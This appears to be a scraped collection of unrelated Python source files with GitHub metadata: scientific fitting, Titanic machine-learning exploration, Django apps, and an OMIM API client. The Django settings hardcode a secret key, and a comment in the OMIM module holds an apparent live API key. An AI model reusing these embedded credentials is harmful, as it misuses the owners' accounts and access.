question = Column(String)
answer = Column(String)
category = Column(String)
difficulty = Column(Integer)
def __init__(self, question, answer, category, difficulty):
self.question = question
self.answer = answer
self.category = category
self.difficulty = difficulty
def insert(self):
db.session.add(self)
db.session.commit()
def update(self):
db.session.commit()
def delete(self):
db.session.delete(self)
db.session.commit()
def format(self):
return {
'id': self.id,
'question': self.question,
'answer': self.answer,
'category': self.category,
'difficulty': self.difficulty
}
'''
Category
'''
class Category(db.Model):
__tablename__ = 'categories'
id = Column(Integer, primary_key=True)
type = Column(String)
def __init__(self, type):
self.type = type
def format(self):
return {
'id': self.id,
'type': self.type
} | [
"45246427+MohamedKhaledRamadan@users.noreply.github.com"
] | 45246427+MohamedKhaledRamadan@users.noreply.github.com |
836137976b1602bfd7b0c88ce367f8879ece8e32 | b80385c2906eabac01e32703e01d26069bdfb26e | /p521_gauss_fit_Eu_ge.py | 974706d58aa19f236a07fd895a856092d9099637 | [] | no_license | glastyp/p5_python_scipts | 6b8f435483b131057ca39cdb75c3e25f75bfe6c6 | 885d17b95a4a2aed11a5bd7535009074d8cc8eb9 | refs/heads/main | 2023-06-26T12:18:23.765986 | 2021-07-13T12:58:30 | 2021-07-13T12:58:30 | 366,188,869 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,119 | py | """
Created on Tue Nov 24 14:19:15 2020
@author: david
"""
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize
# Title for input- and output-file
TITLE = "gauss_fit_Eu_ge"
FILE = "Europium3_Dekt_Ge"
PARAMS = "%s_params.txt" % TITLE
output_filename = "%s.pdf" % TITLE
source_filename = "%s.txt" % FILE
xlabel = "Kanal"
ylabel = "Anzahl Ereignisse"
title = "Spektrum der Europium-Quelle mit Anpassung"
peaks = 10
width = 400
def gaus(x, a, b, c):
return a*np.exp(-(x-b)**2/(2*c**2))
def f(x, a, b, c, d, e):
return gaus(x, a, b, c) + x*d + e
alpha = 5.14
beta = -31.4
def comp(K):
return K/(1+(511-beta)/(2*alpha*K))
data = open(source_filename, 'r')
lines=data.readlines()
x=[]
y=[]
for i in lines:
x.append(float(i.split()[0]))
y.append(float(i.split()[2]))
data.close()
paramdata = open(PARAMS, 'r')
lines = paramdata.readlines()
params = []
for j in range(3):
for i in lines:
params.append(float(i.split()[j]))
paramdata.close()
d = -0.01
e = 100
for i in range(2):
for j in range(peaks):
params.append(d)
for j in range(peaks):
params.append(e)
fity = []
fitx = []
for i in range(peaks):
if(i == 9):
width = 250
cp = int(params[i+peaks]) # cp: current peak
cpar = [params[i], params[i+peaks], params[i + 2*peaks], params[i + 3*peaks], params[i + 4*peaks]]
fit_params, pcov = scipy.optimize.curve_fit(f, x[cp -width:cp + width], y[cp-width:cp+width], p0=cpar)
perr = np.sqrt(np.diag(pcov))
print(fit_params)
for j in range(2*width):
fity.append(f(x[cp+j-width],*fit_params))
fitx.append(x[cp+j-width])
fig_U = plt.figure(dpi=400)
plt.title(title,y=1.08)
plt.xlabel(xlabel)
plt.ylabel(ylabel)
plt.plot(fitx, fity, color = 'r', label="Anpassung", zorder=2)
plt.scatter(x, y, color='black', marker = '+', s=10, linewidths = 0.4, label="Messwerte", zorder=1)
plt.legend(loc='best')
plt.grid(True, zorder=0)
fig_U.savefig(output_filename) | [
"noreply@github.com"
] | glastyp.noreply@github.com |
62f9d527f1538ca78f849e30e50bf5cd1979879e | afd773c1659d1104d7a39130d796c727b1836ac5 | /data_exploration.py | 4cbad90bd506b251d46c9db5fc30abce8e0f3074 | [] | no_license | benoitme/kaggle_titanic | 4168571e73cd033251db5669250ff08df3bde004 | 1b50e84daf5ae08591066c4b9bf753a88d7e1927 | refs/heads/master | 2021-01-19T17:04:15.815861 | 2017-08-30T14:38:22 | 2017-08-30T14:38:22 | 101,043,345 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,491 | py | # Import packages
import pandas as pd
import numpy as np
import matplotlib.pyplot as plt
import seaborn as sns
import math
# Data import
raw_data = pd.read_csv('data/train.csv')
raw_test = pd.read_csv("data/test.csv")
# Let's start by looking at the data
print(raw_data.head())
print('---------------------------------------------')
print(raw_data.info())
print('---------------------------------------------')
print(raw_data.describe())
print('---------------------------------------------')
# General analysis : number of Nan in the data
print(raw_data.isnull().sum())
# Visual data analysis
# Let's display plots of the different characteristics
# Transform data in something more 'readable' for ML algorithms
train = pd.DataFrame()
train["Pclass"] = raw_data["Pclass"]
train["NameLen"] = raw_data["Name"].apply(len)
train["Sex"] = raw_data["Sex"].apply(lambda x: 0 if x =="female" else 1)
train["Age"] = raw_data["Age"].apply(lambda x: 0 if math.isnan(x) else int(x))
train["Cabin"] = raw_data["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
train["SibSp"] = raw_data["SibSp"]
train["Parch"] = raw_data["Parch"]
train['Fare'] = raw_data['Fare']
raw_data['Embarked'] = raw_data['Embarked'].fillna(value='S')
train["Embarked"] = raw_data['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)
train["Survived"] = raw_data["Survived"]
train.index = raw_data["PassengerId"]
# Same thing on test sample
test = pd.DataFrame()
test["PassengerId"] = raw_test["PassengerId"]
test["Pclass"] = raw_test["Pclass"]
test["NameLen"] = raw_test["Name"].apply(len)
test["Sex"] = raw_test["Sex"].apply(lambda x: 0 if x =="female" else 1)
test["Age"] = raw_test["Age"].apply(lambda x: 0 if math.isnan(x) else int(x))
test["Cabin"] = raw_test["Cabin"].apply(lambda x: 0 if type(x) == float else 1)
test["SibSp"] = raw_test["SibSp"]
test["Parch"] = raw_test["Parch"]
test['Fare'] = raw_test['Fare']
raw_test['Embarked'] = raw_test['Embarked'].fillna(value='S')
train["Embarked"] = raw_test['Embarked'].map( {'S': 0, 'C': 1, 'Q': 2} ).astype(int)
# Lets plot the different features to see the most significant ones
# With the SEM we can see which features are the most significant
# Age does not seem to be that significant for instance
# Of course "Survived" is the most significant ;)
i = 0
f, ax = plt.subplots(8, 1, figsize=(4,12))
f.subplots_adjust(hspace=1.5)
for column in train.columns:
ax[i].set_title(column)
ax[i].bar(train.groupby(column).Survived.mean().index,train.groupby(column).Survived.mean(), yerr=train[column].sem())
i+=1
plt.show()
# Pairplot
colormap = plt.cm.viridis
plt.figure(figsize=(12,12))
plt.title('Pearson Correlation of Features', y=1.05, size=15)
sns.heatmap(train.astype(float).corr(),linewidths=0.1,vmax=1.0, square=True, cmap=colormap, linecolor='white', annot=True)
plt.show()
# Let's do a cross validation for aaaaalll the models
from sklearn.model_selection import train_test_split
X = train[["Pclass", "NameLen", "Sex", "Age", "Cabin", "SibSp", "Parch"]]
y = np.ravel(train["Survived"])
X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.25, random_state=0)
# All the classifiers models
from sklearn.neural_network import MLPClassifier
from sklearn.neighbors import KNeighborsClassifier
from sklearn.svm import SVC
from sklearn.gaussian_process import GaussianProcessClassifier
from sklearn.gaussian_process.kernels import RBF
from sklearn.tree import DecisionTreeClassifier
from sklearn.ensemble import RandomForestClassifier, AdaBoostClassifier
from sklearn.naive_bayes import GaussianNB
from sklearn.discriminant_analysis import QuadraticDiscriminantAnalysis
names = ["Nearest Neighbors", "Linear SVM", "RBF SVM", "Gaussian Process",
"Decision Tree", "Random Forest", "Neural Net", "AdaBoost",
"Naive Bayes", "QDA"
]
classifiers = [
KNeighborsClassifier(),
SVC(kernel="linear"),
SVC(kernel="rbf"),
GaussianProcessClassifier(),
DecisionTreeClassifier(),
RandomForestClassifier(n_estimators=1000),
MLPClassifier(),
AdaBoostClassifier(),
GaussianNB(),
QuadraticDiscriminantAnalysis()
]
from sklearn.model_selection import cross_val_score
# Iterate over classifiers
results = {}
for name, clf in zip(names, classifiers):
scores = cross_val_score(clf, X_train, y_train, cv=5)
results[name] = scores
for name, scores in results.items():
print("%20s | Accuracy: %0.2f%% (+/- %0.2f%%)" % (name, 100*scores.mean(), 100*scores.std() * 2)) | [
"lelabodebiologie@gmail.com"
] | lelabodebiologie@gmail.com |
8ebf88061c9c452051abab23fa377846fbc9caaa | edf195dddd13ad6818a47c3332d7c435d166f87f | /todolist/base/models.py | 02d1fcc9d2817715d203a4f7238c81684a6d3df9 | [] | no_license | demidenko406/Todo | 1441cf1c3093aa468bab42751b9f3428c2fbc592 | 267ab6ab3cba71a11c468bed312feba41064856f | refs/heads/master | 2023-05-08T18:06:28.300614 | 2021-06-04T19:23:39 | 2021-06-04T19:23:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 781 | py | from django.db import models
from django.contrib.auth.models import User
class TaskTags(models.Model):
user = models.ForeignKey(User,on_delete=models.CASCADE,null=True,blank=True)
title = models.CharField(max_length=200)
def __str__(self):
return self.title
class Meta:
ordering = ['title']
class Task(models.Model):
user = models.ForeignKey(User,on_delete=models.CASCADE,null=True,blank=True)
title = models.CharField(max_length=200)
description = models.TextField(null=True,blank = True)
complete = models.BooleanField(default=False)
tag = models.ManyToManyField(TaskTags,blank=True,related_name = 'tag')
def __str__(self):
return self.title
class Meta:
ordering = ['complete']
| [
"kalacey@yandex.by"
] | kalacey@yandex.by |
94da2d74654699c85f732d2a1992d5b50ed9256d | 20d629213966c711d4d9b08bc75046cbe799c5eb | /auto-project/case/test_member_balance.py | aa725b5b51bacace8040814c010ee09ad5c1c71c | [] | no_license | evebjayson/test | d234d8f71b227617aa8f516e9563628e0f67c1f3 | c62a4e9e029fb77a307fe802518f12f1bcb31df1 | refs/heads/master | 2020-04-08T14:31:58.959641 | 2019-01-11T09:50:29 | 2019-01-11T09:50:29 | 159,440,791 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 832 | py | import unittest
from common.logger import Log
from common import base
class MemberBalance(unittest.TestCase):
def setUp(self):
self.log = Log()
def test_MemberBalance(self):
'''查询余额'''
route = "/unity/AB/queryqueryBalance"
url = "".join(base.get_url(route))
json = {"siteCode":"ybh",
"userName":"Wo6laX7wDtQj",
}
kwargs = {"json":json}
Method = "post"
resp = base.get_response(url, Method, **kwargs)
self.log.info("-------------start------------")
self.assertEqual(resp.status_code,200,msg="失败原因:%s != %s" %(resp.status_code,200))
self.log.info("----------test is pass----------")
self.log.info("--------------end-------------")
if __name__ == "__main__":
unittest.main() | [
"jayson@e-veb.com"
] | jayson@e-veb.com |
b865ed29544137c57a34d629b4e1e5a5df3b471c | 106fb0868724032e5d9ebee8721af8d333b1a7fb | /cron_events.py | a6c05a6368ebe7cfd0c356c4cc20a8a8bf0ed682 | [] | no_license | ryan-mccaffrey/vote-reminder | 9e3f97555aaa801231010e60cd4064a6661e41e5 | c34bff14515d1249eba931948daf0f89cae92341 | refs/heads/master | 2022-10-07T14:48:49.931393 | 2020-06-09T07:23:53 | 2020-06-09T07:23:53 | 270,488,646 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 92 | py | from main_runner import main_send_events
if __name__ == '__main__':
main_send_events()
| [
"ryan.mccaffrey.42@gmail.com"
] | ryan.mccaffrey.42@gmail.com |
685fda18ad8cf4719f324feb24e823122bb0d341 | 795df757ef84073c3adaf552d5f4b79fcb111bad | /stochastic_diffusion/diffusivity_1d_xk.py | 62a6b21a6bbb4ecffa0bba1ee3ca9d405324092c | [] | no_license | tnakaicode/jburkardt-python | 02cb2f9ba817abf158fc93203eb17bf1cb3a5008 | 1a63f7664e47d6b81c07f2261b44f472adc4274d | refs/heads/master | 2022-05-21T04:41:37.611658 | 2022-04-09T03:31:00 | 2022-04-09T03:31:00 | 243,854,197 | 3 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,885 | py | #! /usr/bin/env python3
#
def diffusivity_1d_xk ( dc0, m, omega, n, x ):
#*****************************************************************************80
#
## DIFFUSIVITY_1D_XK evaluates a 1D stochastic diffusivity function.
#
# Discussion:
#
# The 1D diffusion equation has the form
#
# - d/dx ( DC(X) Del U(X) ) = F(X)
#
# where DC(X) is a function called the diffusivity.
#
# In the stochastic version of the problem, the diffusivity function
# includes the influence of stochastic parameters:
#
# - d/dx ( DC(XOMEGA) d/dx U(X) ) = F(X).
#
# In this function, the domain is assumed to be the unit interval [0.1].
#
#
# For DC0 = 1 and F(X) = 0, with boundary conditions U(0:OMEGA) = 0,
# U(1OMEGA) = 1, the exact solution is
#
# If OMEGA ~= 0:
#
# U(XOMEGA) = log ( 1 + OMEGA * X ) / log ( 1 + OMEGA )
#
# If OMEGA = 0:
#
# U(XOMEGA) = X
#
# In the numerical experiments described in the paper, OMEGA was taken
# to be a random variable with a Beta, or Uniform, or Gaussian or
# Poisson or Binomial distribution.
#
# For the Gaussian and Poisson distributions, the positivity requirement could not
# be guaranteed, and the experiments were simply made with a "small"
# variance of 0.1.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 20 December 2009
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
# Parameters:
#
# Input, real DC0, the constant term in the expansion of the
# diffusion coefficient.
#
# Input, integer M, the number of stochastic parameters.
#
# Input, real OMEGA(M), the stochastic parameters.
#
# Input, integer N, the number of evaluation points.
#
# Input, real X(N), the point where the diffusion coefficient is to
# be evaluated.
#
# Output, real DC(N), the value of the diffusion coefficient at X.
#
import numpy as np
k = 0
w = 1.0
arg = np.zeros(n)
while ( k < m ):
if ( k < m ):
arg = arg + omega[k] * np.sin ( w * np.pi * x )
k = k + 1
if ( k < m ):
arg = arg + omega[k] * np.cos ( w * np.pi * x )
k = k + 1
w = w + 1.0
arg = np.exp ( - 0.125 ) * arg
dc = dc0 + np.exp ( arg )
return dc
def diffusivity_1d_xk_contour ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_contour displays contour plots of a 1D stochastic diffusivity function.
#
# Discussion:
#
# The diffusivity function is compute by DIFFUSIVITY_1D_XK.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Reference:
#
# Dongbin Xiu, George Karniadakis,
# Modeling uncertainty in steady state diffusion problems via
# generalized polynomial chaos,
# Computer Methods in Applied Mechanics and Engineering,
# Volume 191, 2002, pages 4927-4948.
#
import matplotlib.pyplot as plt
import numpy as np
print ( '' )
print ( 'diffusivity_1d_xk_contour' )
print ( ' Display the stochastic diffusivity function' )
print ( ' defined by DIFFUSIVITY_1D_XK.' )
#
# Set the spatial grid.
#
n = 51
x_min = -1.0
x_max = +1.0
x = np.linspace ( x_min, x_max, n )
#
# Sample the OMEGA values.
# Use a seed of 0 for the MATLAB random number generator.
#
m = 5
omega = np.random.randn ( m )
#
# Compute the diffusivity field.
#
dc0 = 10.0
dc = diffusivity_1d_xk ( dc0, m, omega, n, x )
#
# Plot the diffusivity field.
#
plt.plot ( x, dc, linewidth = 2 )
plt.grid ( True )
plt.xlabel ( '<--- X --->' )
plt.ylabel ( 'DC(X)' )
plt.title ( 'XK Stochastic diffusivity function' )
filename = 'diffusivity_1d_xk.png'
plt.savefig ( filename )
print ( '' )
print ( ' Graphics saved as "%s".' % ( filename ) )
return
def diffusivity_1d_xk_test ( ):
#*****************************************************************************80
#
## diffusivity_1d_xk_test tests diffusivity_1d_xk.
#
# Licensing:
#
# This code is distributed under the GNU LGPL license.
#
# Modified:
#
# 08 February 2019
#
# Author:
#
# John Burkardt
#
# Parameters:
#
# None
#
import platform
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Python version: %s' % ( platform.python_version ( ) ) )
print ( ' Test diffusivity_1d_xk.' )
diffusivity_1d_xk_contour ( )
#
# Terminate.
#
print ( '' )
print ( 'diffusivity_1d_xk_test:' )
print ( ' Normal end of execution.' )
return
if ( __name__ == '__main__' ):
from timestamp import timestamp
timestamp ( )
diffusivity_1d_xk_test ( )
timestamp ( )
| [
"tnakaicode@gmail.com"
] | tnakaicode@gmail.com |
e61a78e5bcc8ba3dc3f0285b748ddd0da2eb5458 | 4bc0cbd983e8bb99c369e2b056d1f046028ddc02 | /tests/pass/pass/settings.py | 28e3ebad4cf8372c5afc7b7b876883313400ca32 | [
"CC0-1.0",
"LicenseRef-scancode-public-domain"
] | permissive | dfrankow/django-template-check | cacdfbe706917cf5792bd84ac899ddccfcda1001 | e8a846a48b352190d28d6785445924a8158fbde6 | refs/heads/master | 2023-03-18T16:33:03.400387 | 2020-10-02T17:48:13 | 2020-10-02T17:48:13 | 348,676,153 | 0 | 0 | CC0-1.0 | 2021-03-17T10:57:58 | 2021-03-17T10:57:57 | null | UTF-8 | Python | false | false | 3,138 | py | """
Django settings for pass project.
Generated by 'django-admin startproject' using Django 1.11.8.
For more information on this file, see
https://docs.djangoproject.com/en/1.11/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/1.11/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/1.11/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = '^lwe(bt4(7fh^tg8x7o5yixwce0b8kdje&ld2g&%rgp3xt5$h='
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
INSTALLED_APPS = [
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django_template_check',
'templateapp',
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'pass.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'pass.wsgi.application'
# Database
# https://docs.djangoproject.com/en/1.11/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.sqlite3',
'NAME': os.path.join(BASE_DIR, 'db.sqlite3'),
}
}
# Password validation
# https://docs.djangoproject.com/en/1.11/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/1.11/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/1.11/howto/static-files/
STATIC_URL = '/static/'
| [
"thom@thomwiggers.nl"
] | thom@thomwiggers.nl |
f4f21fb5b2c269df3326b786e78e6edc3d4fb923 | 5b002b82b025ee371432b436a0c19b000a0df2dd | /setup.py | 93cb4423f1905fc32138f022a24043d62d1e8831 | [
"Apache-2.0"
] | permissive | mvexel/whathappened | c5bfeeb1f41b20cd2f5f4c7782412a39090868b2 | 92805128d2a01909d89fca0650b585d8cac256e0 | refs/heads/master | 2021-01-19T09:10:53.189344 | 2017-04-10T00:05:24 | 2017-04-10T00:05:24 | 87,735,951 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 220 | py | from setuptools import setup
setup(
name='whathappened',
packages=['whathappened'],
include_package_data=True,
install_requires=[
'flask',
'requests',
'gunicorn==19.7.0'
],
)
| [
"m@rtijn.org"
] | m@rtijn.org |
cd55a433bc2477bd804d1a7458298478ea1ddffa | 8b97218060d1384b69bb3e286c35e45d1248addf | /leetcode/初级算法-字符串/example.py | 1459b7502f367ec45863cfe21b48e788083a9f4d | [] | no_license | Rooters123/code_calc | a14d155b5c4fdf14366528f55efe63f4f3e02a92 | ca7cc303aeec5eedfb6557562c2cdcb933d3b583 | refs/heads/main | 2023-06-25T11:18:04.995235 | 2021-07-31T07:02:49 | 2021-07-31T07:02:49 | 386,817,254 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,283 | py | # encoding = utf-8
from threading import Thread,Lock,RLock
import time
# 互斥锁
# node_lock = Lock()
# fork_lock = Lock()
node_lock = fork_lock = RLock()
def eat1(name):
# 吃面前的准备
node_lock.acquire()
print("%s拿到面"%name)
fork_lock.acquire()
print("%s拿到叉子"%name)
print("%s开始吃面"%name)
# 吃面后的准备
fork_lock.release()
node_lock.release()
def eat2(name):
# 吃面前的准备,这里是先拿叉子,
fork_lock.acquire()
print("%s拿到叉子" % name)
node_lock.acquire()
print("%s拿到面"%name)
# 这里可以保证一定会产生死锁现象
time.sleep(1)
print("%s开始吃面"%name)
# 吃面后的准备
node_lock.release()
fork_lock.release()
# Thread(target=eat1,args=("zbr",)).start()
# Thread(target=eat2,args=("wdq",)).start()
# Thread(target=eat1,args=("ljy",)).start()
# Thread(target=eat2,args=("lw",)).start()
class test():
def __init__(self):
self.name = "zbr"
@classmethod
def classFunc(cls):
print("我是类方法")
pass
@staticmethod
def staticFunc():
print("我是静态方法")
pass
a = test()
a.classFunc()
| [
"noreply@github.com"
] | Rooters123.noreply@github.com |
cf35173b62a18fc6975721085bd9b534f7ed5298 | 1359e7693cfc2b44002a92a04b82c15fc8810cf8 | /src/screens/loginWindow.py | 373fa90815d0aa4183eb97568ff4952bf6c922d7 | [
"MIT"
] | permissive | tpetersheim-team/tuck | 58ccd07078a7641393aaeec72afd36d895b238a0 | 2e97fe17405cc829b48c4bf20155809f3af94fda | refs/heads/main | 2023-03-12T19:55:35.380050 | 2021-02-06T17:10:46 | 2021-02-06T17:10:46 | 305,575,085 | 2 | 0 | MIT | 2021-03-03T04:17:05 | 2020-10-20T03:06:05 | Python | UTF-8 | Python | false | false | 4,997 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
Login Window for Tuck
"""
# Futures
from __future__ import print_function
# Built-in/Generic Imports
import os
import sys
from typing import Text
from PyQt5.QtCore import pyqtSignal
# Libraries
from PyQt5.QtWidgets import (QCheckBox, QMainWindow, QVBoxLayout, QHBoxLayout, QLabel,
QPushButton, QWidget, QLineEdit)
# Own modules
from stockAPI import StockAPI
from screens.utilities.alertUtility import AlertUtility
# Header release information
__author__ = 'Travis Petersheim & Michael Reichenberger'
__copyright__ = 'Copyright 2020, Friar Tuck'
__credits__ = ['']
__license__ = 'MIT'
__version__ = '0.0.0'
__maintainer__ = 'Travis Petersheim'
__email__ = 'travispetersheim@gmail.com'
__status__ = 'prototype'
class LoginWindow(QMainWindow):
loginSuccess = pyqtSignal()
# Functions
# Initialization
def __init__(self, parent, stockAPI: StockAPI):
super(LoginWindow, self).__init__(parent)
self.stockAPI: StockAPI = stockAPI
self.setWindowTitle("Login")
self.main()
# Main application
def main(self):
# Build the window layout
centralWidget = QWidget(self)
self.setCentralWidget(centralWidget)
mainLayout = QVBoxLayout(self)
centralWidget.setLayout(mainLayout)
userNameLayout = QHBoxLayout(self)
mainLayout.addLayout(userNameLayout)
passwordLayout = QHBoxLayout(self)
mainLayout.addLayout(passwordLayout)
mfaLayout = QHBoxLayout(self)
mainLayout.addLayout(mfaLayout)
stayLoggedInCheckboxLayout = QHBoxLayout(self)
mainLayout.addLayout(stayLoggedInCheckboxLayout)
loginButtonLayout = QHBoxLayout(self)
mainLayout.addLayout(loginButtonLayout)
labelWidth: int = 65
# Add a label for username
userNameLabel = QLabel("Username: ", self)
userNameLabel.setFixedWidth(labelWidth)
userNameLayout.addWidget(userNameLabel)
userNameLabel.show()
# Add a text box for username
self.usernameTextBox = QLineEdit(self)
userNameLayout.addWidget(self.usernameTextBox)
# Add a label for password
passwordLabel = QLabel("Password: ", self)
passwordLabel.setFixedWidth(labelWidth)
passwordLayout.addWidget(passwordLabel)
passwordLabel.show()
# Add a text box for password
self.passwordTextBox = QLineEdit(self)
passwordLayout.addWidget(self.passwordTextBox)
self.passwordTextBox.setEchoMode(QLineEdit.Password)
# Add a label for MFA
mfaLabel = QLabel("MFA Token: ", self)
mfaLabel.setFixedWidth(labelWidth)
mfaLayout.addWidget(mfaLabel)
mfaLabel.show()
# Add a text box for MFA
self.mfaTextBox = QLineEdit(self)
mfaLayout.addWidget(self.mfaTextBox)
# Add checkbox to save login
self.stayLoggedInCheckbox = QCheckBox(self)
self.stayLoggedInCheckbox.setFixedWidth(15)
stayLoggedInCheckboxLayout.addWidget(self.stayLoggedInCheckbox)
# add label for checkbox to save login
stayLoggedInLabel = QLabel(" Stay Logged In?")
stayLoggedInCheckboxLayout.addWidget(stayLoggedInLabel)
# Add a Login button
loginButton = QPushButton("Login", self)
loginButtonLayout.addWidget(loginButton)
# Setup the login button-click action
loginButton.clicked.connect(self.onLoginButtonClicked)
loginButton.setDefault(True)
# Funciton for the button click
def onLoginButtonClicked(self):
username = self.usernameTextBox.text()
password = self.passwordTextBox.text()
mfa = self.mfaTextBox.text()
stayLoggedIn = self.stayLoggedInCheckbox.isChecked()
if not username or not password or not mfa:
AlertUtility.ShowAlert("Username, password, and mfa required")
return
try:
if self.stockAPI.Login(username, password, stayLoggedIn, mfa):
AlertUtility.ShowAlert(f"Successful Login to Robinhood as {username}", self.onAlertButtonClicked)
except Exception as e:
AlertUtility.ShowAlert(f"Login Error: {e}")
def onAlertButtonClicked(self):
self.loginSuccess.emit()
| [
"travispetersheim@gmail.com"
] | travispetersheim@gmail.com |
12d05be280b79cbfe3371ac8145825a52ec3ba4f | 9194738f0a52455b355f0262f39f8c7bcdb82a55 | /lib/omim_api.py | fd69b5a9a04de92fea80669fc03627a0369d50c4 | [] | no_license | jjevans/tools | 5e6de81b98ff7ad80abf3575122d002513dcc06f | 9113ca727e0d45a6f224a683bc0057a7d7b1549c | refs/heads/master | 2021-01-01T19:48:06.216054 | 2017-07-28T21:37:45 | 2017-07-28T21:37:45 | 98,688,731 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | import json
import requests as req
import xml.etree.ElementTree as ET
''' utilize the OMIM api to retrieve data via web service '''
''' api key for 2014 2EF035ECBD2E73BA368BECD371EA3E9E35D84034 '''
class Use():
def __init__(self,apikey,url="http://api.omim.org/api"):
self.key = apikey
self.url = url # url without handler
self.pars = {"apiKey" : self.key,
"format" : "json"}
def get_req(self,handyurl):
try:
response = json.loads(req.get(handyurl,params=self.pars).text)
except ValueError:
response = None
return response
def geneMap_by_att(self,response,attribute):
# returns a list of results by desired geneMap attribute
res = list()
if response is not None:
for genemap in response["omim"]["listResponse"]["geneMapList"]:
res.append(genemap["geneMap"][attribute])
return res
def omim_by_location(self,chr,start,end):
handyurl = self.url + "/geneMap"
self.pars["chromosome"] = chr
# WHY DOESN'T THIS WORK?
#self.pars["chromosomeLocationStart"] = start
#self.pars["chromosomeLocationEnd"] = end
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"mimNumber")
def omim_by_chr(self,chr):
handyurl = self.url + "/geneMap"
self.pars["chromosome"] = chr
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"mimNumber")
def all_omim(self):
handyurl = self.url + "/geneMap"
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"mimNumber")
def sym_by_omim(self,omim):
handyurl = self.url + "/geneMap"
self.pars["mimNumber"] = omim
response = self.get_req(handyurl)
return self.geneMap_by_att(response,"geneSymbols")
def variant_by_omim(self,omim):
handyurl = self.url + "/entry/allelicVariantList"
self.pars["mimNumber"] = omim
response = self.get_req(handyurl)
return response
class Pheno():
# get information for a given phenotype
def __init__(self,apikey,url="http://api.omim.org/api"):
self.key = apikey
self.pars = {"apiKey" : self.key}
self.url = url
def get_req(self,handyurl):
return json.loads(req.get(handyurl,params=self.pars).text)
def get_genes(self,omim):
# takes an omim phenotype number and gets the genes associated with it
handyurl = self.url + "/entry"
self.pars["mimNumber"] = omim
self.pars["include"] = "geneMap"
xml = req.get(handyurl,params=self.pars).text
res = dict() # use keys to sort unique
try: # xml provided back (errors provide html)
elem = ET.fromstring(xml)
for symbols in elem.iter(tag="geneSymbols"):
for sym in symbols.text.split(", "):
res[sym] = None
if len(res.keys()) == 0:
return None
except: # html error returned
return "Error"
return res.keys()
def pheno_series(self,omim):
# takes a omim number and queries for the phenotypicSeries
handyurl = self.url + "/entry"
self.pars["mimNumber"] = omim
self.pars["include"] = "all"
xml = req.get(handyurl,params=self.pars).text
elem = ET.fromstring(xml)
for series in elem.iter(tag="phenotypicSeriesMimNumber"):
print series.text
return
class Search():
def __init__(self,apikey,url="http://api.omim.org/api"):
self.key = apikey
self.url = url # url without handler
self.pars = {"apiKey" : self.key}
def omim_by_search(self,terms):
# input is a string of space separated search terms
handyurl = self.url + "/entry/search"
self.pars["search"] = terms
response = req.get(handyurl,params=self.pars).text
res = self.omim_from_xml(response)
return res
def omim_from_xml(self,xml):
# get the omim ids from a returned xml (search)
try:
elem = ET.fromstring(xml)
res = list()
for omim in elem.iter(tag="mimNumber"):
res.append(omim.text)
except:
print "\nerror at omim_from_xml, not valid xml.\n"
print xml+"\n"
return list()
return res | [
"jason.j.evans@gmail.com"
] | jason.j.evans@gmail.com |
